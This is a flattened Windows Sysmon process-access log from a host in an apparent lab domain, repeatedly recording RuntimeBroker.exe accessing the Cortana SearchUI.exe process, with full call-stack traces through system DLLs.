13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 